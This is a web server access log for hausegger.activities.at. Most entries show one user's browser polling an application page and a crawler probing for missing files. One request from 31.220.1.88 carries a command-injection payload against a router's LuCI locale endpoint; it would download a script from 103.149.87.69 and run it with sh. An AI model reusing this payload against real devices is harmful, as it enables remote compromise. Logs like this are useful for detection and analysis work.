178.115.42.220 - - [02/Dec/2024:11:06:01 +0100] "GET /entry.php?id=10271&&ser=133901 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=133841" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:06:01 +0100] "GET /gui/javascript/form_form.js?1733133961 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=133901" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:07:06 +0100] "GET /entry.php?id=10271&&ser=133961 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=133901" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:07:06 +0100] "GET /gui/javascript/form_form.js?1733134026 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=133961" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [02/Dec/2024:11:08:02 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006051203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:08:06 +0100] "GET /entry.php?id=10271&&ser=134026 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=133961" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:08:06 +0100] "GET /gui/javascript/form_form.js?1733134086 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134026" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:09:06 +0100] "GET /entry.php?id=10271&&ser=134086 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134026" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:09:07 +0100] "GET /gui/javascript/form_form.js?1733134146 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134086" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:10:07 +0100] "GET /entry.php?id=10271&&ser=134146 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134086" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:10:07 +0100] "GET /gui/javascript/form_form.js?1733134207 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134146" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:11:07 +0100] "GET /entry.php?id=10271&&ser=134207 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134146" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:11:07 +0100] "GET /gui/javascript/form_form.js?1733134267 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134207" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:11:12:03 +0100] "GET /renault.activities.at/htdocs/binaries/10023570.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:12:07 +0100] "GET /entry.php?id=10271&&ser=134267 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134207" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:12:07 +0100] "GET /gui/javascript/form_form.js?1733134327 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134267" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:13:08 +0100] "GET /entry.php?id=10271&&ser=134327 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134267" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:13:08 +0100] "GET /gui/javascript/form_form.js?1733134388 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134327" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:14:08 +0100] "GET /entry.php?id=10271&&ser=134388 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134327" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:14:08 +0100] "GET /gui/javascript/form_form.js?1733134448 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134388" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:15:08 +0100] "GET /entry.php?id=10271&&ser=134448 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134388" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:15:08 +0100] "GET /gui/javascript/form_form.js?1733134508 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134448" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [02/Dec/2024:11:16:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104011703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:16:08 +0100] "GET /entry.php?id=10271&&ser=134508 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134448" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:16:09 +0100] "GET /gui/javascript/form_form.js?1733134568 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134508" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:17:09 +0100] "GET /entry.php?id=10271&&ser=134568 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134508" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:17:09 +0100] "GET /gui/javascript/form_form.js?1733134629 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134568" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:18:09 +0100] "GET /entry.php?id=10271&&ser=134629 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134568" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:18:09 +0100] "GET /gui/javascript/form_form.js?1733134689 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134629" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:19:09 +0100] "GET /entry.php?id=10271&&ser=134689 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134629" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:19:09 +0100] "GET /gui/javascript/form_form.js?1733134749 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134689" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:11:20:03 +0100] "GET /ed-test.activities.at/stats/lang/awstats-id.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:20:10 +0100] "GET /entry.php?id=10271&&ser=134749 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134689" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:20:10 +0100] "GET /gui/javascript/form_form.js?1733134810 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134749" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:21:10 +0100] "GET /entry.php?id=10271&&ser=134810 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134749" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:21:10 +0100] "GET /gui/javascript/form_form.js?1733134870 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134810" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:22:10 +0100] "GET /entry.php?id=10271&&ser=134870 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=134810" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:22:10 +0100] "GET /gui/javascript/form_form.js?1733134930 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134870" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
31.220.1.88 - - [02/Dec/2024:11:22:18 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.115.42.220 - - [02/Dec/2024:11:23:10 +0100] "GET /entry.php?id=10271&&ser=134930 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134870" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:23:11 +0100] "GET /gui/javascript/form_form.js?1733134991 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [02/Dec/2024:11:24:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011241403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:24:11 +0100] "GET /entry.php?id=10271&&ser=134991 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134930" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:24:11 +0100] "GET /gui/javascript/form_form.js?1733135051 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=134991" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:25:11 +0100] "GET /entry.php?id=10271&&ser=135051 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=134991" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:25:11 +0100] "GET /gui/javascript/form_form.js?1733135111 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135051" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:26:11 +0100] "GET /entry.php?id=10271&&ser=135111 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=135051" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:26:11 +0100] "GET /gui/javascript/form_form.js?1733135171 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:12 +0100] "GET /entry.php?id=10271&&ser=135171 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=135111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:12 +0100] "GET /gui/javascript/form_form.js?1733135232 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135171" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:19 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9139 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:20 +0100] "GET /gui/javascript/form_form.js?1733135239 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:20 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:20 +0100] "GET /gui/javascript/form_form.js?1733135240 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:21 +0100] "GET /entry.php?id=11237&type=10665 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:21 +0100] "GET /entry.php?id=11239&mode=document&form=10665& HTTP/1.1" 200 2016 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:21 +0100] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1390 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1733135242 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /gui/javascript/form_form.js?1733135242 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /gui/javascript/form_form.js?1733135242 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /entry.php?id=11238&mode=document&form=10665& HTTP/1.1" 200 3303 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /entry.php?id=11240&mode=document&form=10665& HTTP/1.1" 200 2663 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2586 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:22 +0100] "POST /entry.php?id=11240 HTTP/1.1" 200 2671 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:23 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1733135243 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:23 +0100] "GET /gui/javascript/form_form.js?1733135243 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:23 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 3031 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:23 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:50 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 8712 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:50 +0100] "GET /gui/javascript/form_form.js?1733135270 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:50 +0100] "GET /entry.php?id=10889&document_id=10345231& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:53 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 8781 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:54 +0100] "GET /gui/javascript/form_form.js?1733135274 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:27:54 +0100] "GET /entry.php?id=10889&document_id=10345231& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:11:28:04 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005201103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:28:12 +0100] "GET /entry.php?id=10271&&ser=135232 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=135171" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:28:12 +0100] "GET /gui/javascript/form_form.js?1733135292 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135232" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:28:13 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9140 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:28:13 +0100] "GET /gui/javascript/form_form.js?1733135293 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:28:13 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:29:15 +0100] "GET /entry.php?id=10271&&ser=135292 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=135232" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:29:15 +0100] "GET /gui/javascript/form_form.js?1733135355 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135292" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:30:16 +0100] "GET /entry.php?id=10271&&ser=135355 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=135292" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:30:16 +0100] "GET /gui/javascript/form_form.js?1733135416 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135355" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:31:16 +0100] "GET /entry.php?id=10271&&ser=135416 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=135355" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:31:16 +0100] "GET /gui/javascript/form_form.js?1733135476 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135416" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:11:32:04 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image147.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:32:16 +0100] "GET /entry.php?id=10271&&ser=135476 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=135416" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:32:16 +0100] "GET /gui/javascript/form_form.js?1733135536 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135476" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:33:22 +0100] "GET /entry.php?id=10271&&ser=135536 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=135476" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:33:22 +0100] "GET /gui/javascript/form_form.js?1733135602 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135536" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:34:22 +0100] "GET /entry.php?id=10271&&ser=135602 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=135536" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:34:22 +0100] "GET /gui/javascript/form_form.js?1733135662 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:35:27 +0100] "GET /entry.php?id=10271&&ser=135662 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=135602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:35:27 +0100] "GET /gui/javascript/form_form.js?1733135727 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=135662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:36:27 +0100] "GET /entry.php?id=10271&&ser=135727 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=135662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
